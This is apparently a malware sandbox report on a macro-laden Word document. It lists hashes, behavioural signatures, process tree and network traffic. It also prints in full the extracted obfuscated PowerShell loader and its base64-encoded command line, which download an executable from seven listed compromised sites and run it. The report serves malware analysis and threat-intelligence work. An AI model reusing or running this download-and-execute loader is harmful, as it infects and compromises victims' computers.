Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
101s -
max time network
34s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
-
submitted
08/09/2024, 17:55 UTC
General
-
Target
d4eb931d97a7ae1aa727f68d32763920_JaffaCakes118.doc
-
Size
154KB
-
MD5
d4eb931d97a7ae1aa727f68d32763920
-
SHA1
807182407c85efe5880aacfa21043e487b7871c8
-
SHA256
b5be7bb2f5a521f8ec0417e9f4da3c9f919f688a9a2c089b1503e1bab24e3eff
-
SHA512
ae357488a9aac61d9fc155db2f8b360952f789f371103ea57dfc65e11140d604d7838444e16e1c9a88158a8912f515a040755cdc41618d891211b4dfb7d739ff
-
SSDEEP
1536:CJ0ZsWTJ0ZsWirdi1Ir77zOH98Wj2gpngR+a9UQ54LW0wK:5rfrzOH98ipgg+qDwK
Score
10/10
Malware Config
Extracted
Language
ps1
Source
1
$W2cgzps=('A2'+('2q6o'+'c'));.('ne'+'w-ite'+'m') $env:USERpROFiLe\Ui7CK98\cuYPuXv\ -itemtype diRECToRy;[Net.ServicePointManager]::"SECUrItY`Pr`OTO`C`OL" = ('tl'+('s1'+'2'+', tls11,')+(' t'+'l')+'s');$H1023v2 = ('D'+'k'+('z5'+'4ym'+'i0'));$J07poxe=(('Was'+'v')+('ao'+'2'));$E6wrtt6=$env:userprofile+((('zFf'+'Ui')+'7'+'c'+('k98zF'+'fC'+'uy')+'pu'+('x'+'vzFf'))."REpL`Ace"(([ChAr]122+[ChAr]70+[ChAr]102),'\'))+$H1023v2+('.e'+'xe');$Buhq02r=('Hk'+('03vg'+'p'));$Cwojal7=.('new-o'+'bje'+'ct') NeT.webcLIEnt;$A7zaf5e=(('h'+'ttp')+(':/'+'/intras')+('ist'+'e')+('ma'+'s')+('.com/'+'c')+'g'+('i-b'+'i')+'n'+('/'+'mTQl')+('s3/'+'*ht'+'t'+'p'+'://gfo')+('rce'+'ms')+'.'+('i'+'t/')+'m'+'o'+'du'+('le'+'s')+('/D'+'/')+'*'+'h'+('tt'+'p')+':/'+('/'+'coo')+('l'+'tattoo')+'.'+('es/h'+'a'+'tone')+('/6'+'YA')+('A0'+'O2/*h'+'tt'+'p')+('://d'+'ie'+'s')+'ne'+('r'+'.de/')+('css/c'+'f')+'/'+('*ht'+'t')+'p'+(':/'+'/go4')+('it24'+'.b'+'e/')+('adm'+'i')+'n'+('i'+'stra'+'tor/Q'+'1')+'r'+('3/*'+'http:'+'//e')+'l'+'t'+('ra'+'fal'+'g'+'ar.c')+('om/w'+'p-'+'in'+'cludes/'+'VF'+'Si')+('/'+'*h')+('ttp'+':/')+('/i'+'n')+('f'+'oe')+('stud'+'i')+'o.'+'e'+('s/'+'cur')+('sos/q'+'PP/'))."s`pLIt"([char]42);$F8ctwwm=(('I'+'lscn')+'uj');foreach($L70rbz2 in $A7zaf5e){try{$Cwojal7."DOwn`load`F`iLe"($L70rbz2, $E6wrtt6);$Cow4bs5=('Me'+('fd'+'z')+'m0');If ((&('G'+'et-Ite'+'m') $E6wrtt6)."L`E`NGTh" -ge 33911) {&('Inv'+'oke-I'+'t'+'em')($E6wrtt6);$Rnelh5r=('C'+'f'+('yi'+'po1'));break;$Rzhvw31=(('Lb'+'rqi')+'p_')}}catch{}}$Urzhf07=('Ev'+('9'+'mgo')+'c')
URLs
exe.dropper
http://intrasistemas.com/cgi-bin/mTQls3/
exe.dropper
http://gforcems.it/modules/D/
exe.dropper
http://cooltattoo.es/hatone/6YAA0O2/
exe.dropper
http://diesner.de/css/cf/
exe.dropper
http://go4it24.be/administrator/Q1r3/
exe.dropper
http://eltrafalgar.com/wp-includes/VFSi/
exe.dropper
http://infoestudio.es/cursos/qPP/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Blocklisted process makes network request 7 IoCs
-
Drops file in System32 directory 1 IoCs
-
Drops file in Windows directory 1 IoCs
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Office loads VBA resources, possible macro or embedded object present
-
Modifies registry class 64 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of SetWindowsHookEx 2 IoCs
-
Suspicious use of WriteProcessMemory 4 IoCs
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\d4eb931d97a7ae1aa727f68d32763920_JaffaCakes118.doc"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e JABXADIAYwBnAHoAcABzAD0AKAAnAEEAMgAnACsAKAAnADIAcQA2AG8AJwArACcAYwAnACkAKQA7AC4AKAAnAG4AZQAnACsAJwB3AC0AaQB0AGUAJwArACcAbQAnACkAIAAkAGUAbgB2ADoAVQBTAEUAUgBwAFIATwBGAGkATABlAFwAVQBpADcAQwBLADkAOABcAGMAdQBZAFAAdQBYAHYAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAAZABpAFIARQBDAFQAbwBSAHkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMARQBDAFUAcgBJAHQAWQBgAFAAcgBgAE8AVABPAGAAQwBgAE8ATAAiACAAPQAgACgAJwB0AGwAJwArACgAJwBzADEAJwArACcAMgAnACsAJwAsACAAdABsAHMAMQAxACwAJwApACsAKAAnACAAdAAnACsAJwBsACcAKQArACcAcwAnACkAOwAkAEgAMQAwADIAMwB2ADIAIAA9ACAAKAAnAEQAJwArACcAawAnACsAKAAnAHoANQAnACsAJwA0AHkAbQAnACsAJwBpADAAJwApACkAOwAkAEoAMAA3AHAAbwB4AGUAPQAoACgAJwBXAGEAcwAnACsAJwB2ACcAKQArACgAJwBhAG8AJwArACcAMgAnACkAKQA7ACQARQA2AHcAcgB0AHQANgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAoACgAKAAnAHoARgBmACcAKwAnAFUAaQAnACkAKwAnADcAJwArACcAYwAnACsAKAAnAGsAOQA4AHoARgAnACsAJwBmAEMAJwArACcAdQB5ACcAKQArACcAcAB1ACcAKwAoACcAeAAnACsAJwB2AHoARgBmACcAKQApAC4AIgBSAEUAcABMAGAAQQBjAGUAIgAoACgAWwBDAGgAQQByAF0AMQAyADIAKwBbAEMAaABBAHIAXQA3ADAAKwBbAEMAaABBAHIAXQAxADAAMgApACwAJwBcACcAKQApACsAJABIADEAMAAyADMAdgAyACsAKAAnAC4AZQAnACsAJwB4AGUAJwApADsAJABCAHUAaABxADAAMgByAD0AKAAnAEgAawAnACsAKAAnADAAMwB2AGcAJwArACcAcAAnACkAKQA7ACQAQwB3AG8AagBhAGwANwA9AC4AKAAnAG4AZQB3AC0AbwAnACsAJwBiAGoAZQAnACsAJwBjAHQAJwApACAATgBlAFQALgB3AGUAYgBjAEwASQBFAG4AdAA7ACQAQQA3AHoAYQBmADUAZQA9ACgAKAAnAGgAJwArACcAdAB0AHAAJwApACsAKAAnADoALwAnACsAJwAvAGkAbgB0AHIAYQBzACcAKQArACgAJwBpAHMAdAAnACsAJwBlACcAKQArACgAJwBtAGEAJwArACcAcwAnACkAKwAoACcALgBjAG8AbQAvACcAKwAnAGMAJwApACsAJwBnACcAKwAoACcAaQAtAGIAJwArACcAaQAnACkAKwAnAG4AJwArACgAJwAvACcAKwAnAG0AVABRAGwAJwApACsAKAAnAHMAMwAvACcAKwAnACoAaAB0ACcAKwAnAHQAJwArACcAcAAnACsAJwA6AC8ALwBnAGYAbwAnACkAKwAoACcAcgBjAGUAJwArACcAbQBzACcAKQArACcALgAnACsAKAAnAGkAJwArACcAdAAvACcAKQArACcAbQAnACsAJwBvACcAKwAnAGQAdQAnACsAKAAnAGwAZQAnACsAJwBzACcAKQArACgAJwAvAEQAJwArACcALwAnACkAKwAnACoAJwArACcAaAAnACsAKAAnAHQAdAAnACsAJwBwACcAKQArACcAOgAvACcAKwAoACcALwAnACsAJwBjAG8AbwAnACkAKwAoACcAbAAnACsAJwB0AGEAdAB0AG8AbwAnACkAKwAnAC4AJwArACgAJwBlAHMALwBoACcAKwAnAGEAJwArACcAdABvAG4AZQAnACkAKwAoACcALwA2ACcAKwAnAFkAQQAnACkAKwAoACcAQQAwACcAKwAnAE8AMgAvACoAaAAnACsAJwB0AHQAJwArACcAcAAnACkAKwAoACcAOgAvAC8AZAAnACsAJwBpAGUAJwArACcAcwAnACkAKwAnAG4AZQAnACsAKAAnAHIAJwArACcALgBkAGUALwAnACkAKwAoACcAYwBzAHMALwBjACcAKwAnAGYAJwApACsAJwAvACcAKwAoACcAKgBoAHQAJwArACcAdAAnACkAKwAnAHAAJwArACgAJwA6AC8AJwArACcALwBnAG8ANAAnACkAKwAoACcAaQB0ADIANAAnACsAJwAuAGIAJwArACcAZQAvACcAKQArACgAJwBhAGQAbQAnACsAJwBpACcAKQArACcAbgAnACsAKAAnAGkAJwArACcAcwB0AHIAYQAnACsAJwB0AG8AcgAvAFEAJwArACcAMQAnACkAKwAnAHIAJwArACgAJwAzAC8AKgAnACsAJwBoAHQAdABwADoAJwArACcALwAvAGUAJwApACsAJwBsACcAKwAnAHQAJwArACgAJwByAGEAJwArACcAZgBhAGwAJwArACcAZwAnACsAJwBhAHIALgBjACcAKQArACgAJwBvAG0ALwB3ACcAKwAnAHAALQAnACsAJwBpAG4AJwArACcAYwBsAHUAZABlAHMALwAnACsAJwBWAEYAJwArACcAUwBpACcAKQArACgAJwAvACcAKwAnACoAaAAnACkAKwAoACcAdAB0AHAAJwArACcAOgAvACcAKQArACgAJwAvAGkAJwArACcAbgAnACkAKwAoACcAZgAnACsAJwBvAGUAJwApACsAKAAnAHMAdAB1AGQAJwArACcAaQAnACkAKwAnAG8ALgAnACsAJwBlACcAKwAoACcAcwAvACcAKwAnAGMAdQByACcAKQArACgAJwBzAG8AcwAvAHEAJwArACcAUABQAC8AJwApACkALgAiAHMAYABwAEwASQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQARgA4AGMAdAB3AHcAbQA9ACgAKAAnAEkAJwArACcAbABzAGMAbgAnACkAKwAnAHUAagAnACkAOwBmAG8AcgBlAGEAYwBoACgAJABMADcAMAByAGIAegAyACAAaQBuACAAJABBADcAegBhAGYANQBlACkAewB0AHIAeQB7ACQAQwB3AG8AagBhAGwANwAuACIARABPAHcAbgBgAGwAbwBhAGQAYABGAGAAaQBMAGUAIgAoACQATAA3ADAAcgBiAHoAMgAsACAAJABFADYAdwByAHQAdAA2ACkAOwAkAEMAbwB3ADQAYgBzADUAPQAoACcATQBlACcAKwAoACcAZgBkACcAKwAnAHoAJwApACsAJwBtADAAJwApADsASQBmACAAKAAoACYAKAAnAEcAJwArACcAZQB0AC0ASQB0AGUAJwArACcAbQAnACkAIAAkAEUANgB3AHIAdAB0ADYAKQAuACIATABgAEUAYABOAEcAVABoACIAIAAtAGcAZQAgADMAMwA5ADEAMQApACAAewAmACgAJwBJAG4AdgAnACsAJwBvAGsAZQAtAEkAJwArACcAdAAnACsAJwBlAG0AJwApACgAJABFADYAdwByAHQAdAA2ACkAOwAkAFIAbgBlAGwAaAA1AHIAPQAoACcAQwAnACsAJwBmACcAKwAoACcAeQBpACcAKwAnAHAAbwAxACcAKQApADsAYgByAGUAYQBrADsAJABSAHoAaAB2AHcAMwAxAD0AKAAoACcATABiACcAKwAnAHIAcQBpACcAKQArACcAcABfACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAVQByAHoAaABmADAANwA9ACgAJwBFAHYAJwArACgAJwA5ACcAKwAnAG0AZwBvACcAKQArACcAYwAnACkA1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
-
DNSintrasistemas.comRemote address:8.8.8.8:53Requestintrasistemas.comIN AResponse -
DNSgforcems.itRemote address:8.8.8.8:53Requestgforcems.itIN AResponsegforcems.itIN A185.2.4.118
-
GEThttp://gforcems.it/modules/D/Remote address:185.2.4.118:80RequestGET /modules/D/ HTTP/1.1
Host: gforcems.it
Connection: Keep-Alive
ResponseHTTP/1.1 404 Not Found
Date: Sun, 08 Sep 2024 17:56:02 GMT
Server: Apache
Accept-Ranges: bytes
Keep-Alive: timeout=5, max=150
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html
-
DNScooltattoo.esRemote address:8.8.8.8:53Requestcooltattoo.esIN AResponsecooltattoo.esIN A217.76.128.47
-
GEThttp://cooltattoo.es/hatone/6YAA0O2/Remote address:217.76.128.47:80RequestGET /hatone/6YAA0O2/ HTTP/1.1
Host: cooltattoo.es
Connection: Keep-Alive
ResponseHTTP/1.1 503 Service Unavailable
Date: Sun, 08 Sep 2024 17:56:03 GMT
Server: Apache
X-ServerIndex: llim605
Content-Length: 299
Connection: close
Content-Type: text/html; charset=iso-8859-1
-
DNSdiesner.deRemote address:8.8.8.8:53Requestdiesner.deIN AResponsediesner.deIN A81.169.145.94
-
GEThttp://diesner.de/css/cf/Remote address:81.169.145.94:80RequestGET /css/cf/ HTTP/1.1
Host: diesner.de
Connection: Keep-Alive
ResponseHTTP/1.1 404 Not Found
Date: Sun, 08 Sep 2024 17:56:03 GMT
Server: Apache/2.4.62 (Unix)
Content-Length: 196
Keep-Alive: timeout=3, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
-
DNSgo4it24.beRemote address:8.8.8.8:53Requestgo4it24.beIN AResponsego4it24.beIN A46.30.215.42
-
GEThttp://go4it24.be/administrator/Q1r3/Remote address:46.30.215.42:80RequestGET /administrator/Q1r3/ HTTP/1.1
Host: go4it24.be
Connection: Keep-Alive
ResponseHTTP/1.1 404 Not Found
Date: Sun, 08 Sep 2024 17:55:55 GMT
Server: Apache
Content-Length: 196
Content-Type: text/html; charset=iso-8859-1
X-Onecom-Cluster-Name:
X-Varnish: 680793946 625254740
Age: 7
Via: 1.1 webcache2 (Varnish/trunk)
Connection: keep-alive
-
DNSeltrafalgar.comRemote address:8.8.8.8:53Requesteltrafalgar.comIN AResponseeltrafalgar.comIN A172.67.136.52eltrafalgar.comIN A104.21.64.201
-
GEThttp://eltrafalgar.com/wp-includes/VFSi/Remote address:172.67.136.52:80RequestGET /wp-includes/VFSi/ HTTP/1.1
Host: eltrafalgar.com
Connection: Keep-Alive
ResponseHTTP/1.1 301 Moved Permanently
Date: Sun, 08 Sep 2024 17:56:03 GMT
Content-Type: text/html
Content-Length: 167
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Sun, 08 Sep 2024 18:56:03 GMT
Location: https://eltrafalgar.com/wp-includes/VFSi/
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3zMVBH%2BXCaAc8GNMhVKcRbAvQ%2FHBJ7txh4VTeYEE%2FHoxLPdw9wep9gLLl66NZ7HiZ5P9cNaNXNEK7bXn0qVAx9uTro%2FSxVaBihs4I3KGl%2BRLslTotbOBPhnxxKjh60pJ%2BxM%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c00d0222b819580-LHR
alt-svc: h3=":443"; ma=86400
-
GEThttps://eltrafalgar.com/wp-includes/VFSi/Remote address:172.67.136.52:443RequestGET /wp-includes/VFSi/ HTTP/1.1
Host: eltrafalgar.com
Connection: Keep-Alive
ResponseHTTP/1.1 404 Not Found
Date: Sun, 08 Sep 2024 17:56:04 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding,User-Agent
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KsTM%2BohlkuIjJ040PpRi0w7J7fdLcU%2Bmkl%2FFwNzAluu1fW5LoawkhkuMpxMBMzcz52e%2F4jffn0YG0JuCRWh4x9P5F1rfEzZ22BbZNMIyVW2sAxHrixLdUb9SXHUhBXGaHMA%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c00d0241a4071f3-LHR
alt-svc: h3=":443"; ma=86400
-
DNSinfoestudio.esRemote address:8.8.8.8:53Requestinfoestudio.esIN AResponseinfoestudio.esIN A217.76.150.22
-
185.2.4.118:80http://gforcems.it/modules/D/http
HTTP Request
GET http://gforcems.it/modules/D/HTTP Response
404 -
217.76.128.47:80http://cooltattoo.es/hatone/6YAA0O2/http
HTTP Request
GET http://cooltattoo.es/hatone/6YAA0O2/HTTP Response
503 -
81.169.145.94:80http://diesner.de/css/cf/http
HTTP Request
GET http://diesner.de/css/cf/HTTP Response
404 -
46.30.215.42:80http://go4it24.be/administrator/Q1r3/http
HTTP Request
GET http://go4it24.be/administrator/Q1r3/HTTP Response
404 -
172.67.136.52:80http://eltrafalgar.com/wp-includes/VFSi/http
HTTP Request
GET http://eltrafalgar.com/wp-includes/VFSi/HTTP Response
301 -
172.67.136.52:443https://eltrafalgar.com/wp-includes/VFSi/tls, http
HTTP Request
GET https://eltrafalgar.com/wp-includes/VFSi/HTTP Response
404 -
217.76.150.22:80infoestudio.es
-
8.8.8.8:53intrasistemas.comdns
DNS Request
intrasistemas.com
-
8.8.8.8:53gforcems.itdns
DNS Request
gforcems.it
DNS Response
185.2.4.118
-
8.8.8.8:53cooltattoo.esdns
DNS Request
cooltattoo.es
DNS Response
217.76.128.47
-
8.8.8.8:53diesner.dedns
DNS Request
diesner.de
DNS Response
81.169.145.94
-
8.8.8.8:53go4it24.bedns
DNS Request
go4it24.be
DNS Response
46.30.215.42
-
8.8.8.8:53eltrafalgar.comdns
DNS Request
eltrafalgar.com
DNS Response
172.67.136.52104.21.64.201
-
8.8.8.8:53infoestudio.esdns
DNS Request
infoestudio.es
DNS Response
217.76.150.22
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
19KB
MD5f2a279857249393e3c12411912eabd23
SHA1e53fbe5fb91259d7835c889096511c91eb68af5b
SHA2563645fc78c2bac221dee47d131ca1efb970809e98e43235d6bba4988e41075dab
SHA51256b20e1c81860f6aa74408f60e49cccd606f6cae74efcc5329ca9f3539db44498a62303c923008547cf45a52ded09444e9b4e5f60b0fd90c6f744606e60bf342
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
44KB
-
Filesize
1024KB
-
Filesize
44KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
44KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
4KB
-
Filesize
1024KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
2.9MB
-
Filesize
32KB